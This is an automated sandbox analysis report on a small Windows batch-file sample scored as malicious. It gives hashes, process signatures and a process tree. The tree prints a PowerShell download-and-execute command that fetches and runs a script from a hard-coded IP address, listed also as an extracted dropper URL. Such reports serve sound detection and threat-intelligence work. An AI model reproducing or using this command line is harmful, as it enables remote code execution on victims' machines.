Analysis
  max time kernel:  128s
  max time network: 68s
  platform:         windows10_x64
  resource:         win10v200430
  submitted:        11-06-2020 21:10
Static task: static1

Behavioral task: behavioral1
  Sample:   25beb425e3126143f961ead9e6eda285.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample:   25beb425e3126143f961ead9e6eda285.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 25beb425e3126143f961ead9e6eda285.bat
  Size:   220B
  MD5:    f519bf505e47286d4237924b8d9b7aac
  SHA1:   503b29182aa3c2b01f3ac4a4846eae307e1c22bc
  SHA256: a22cfd42ad2a8cec8a49dc236b16ed7579c0ece0e048546b759a9fc620b79987
  SHA512: 28300f35bc17da4eb060ee5cac3258c1dd57b4f287bdd63c107bd3f5c25246d6a34bba484ee8c4cdaf615c7ef4498fc02665c0268f59b92b05d74fbfeb936c8c
  Score:  10/10
Malware Config
  Extracted
    Language: ps1
    Source:   ps1.dropper
    URLs:     http://185.103.242.78/pastes/25beb425e3126143f961ead9e6eda285
Signatures

  Program crash (1 IoC)
    Processes:
      pid   process       target pid   target process
      1764  WerFault.exe  1324         powershell.exe

  Suspicious use of AdjustPrivilegeToken (3 IoCs)
    Processes:
      description                pid   process
      Token: SeRestorePrivilege  1764  WerFault.exe
      Token: SeBackupPrivilege   1764  WerFault.exe
      Token: SeDebugPrivilege    1764  WerFault.exe

  Suspicious behavior: EnumeratesProcesses (14 IoCs)
    Processes:
      pid   process
      1764  WerFault.exe (same entry listed 14 times)
Processes (tree; indentation shows parent/child depth)

  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\25beb425e3126143f961ead9e6eda285.bat"
    PID: 3264

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/25beb425e3126143f961ead9e6eda285');Invoke-YOGGLCMTVFBXE;Start-Sleep -s 10000"
      PID: 1324

      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 704
        PID: 1764
        Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses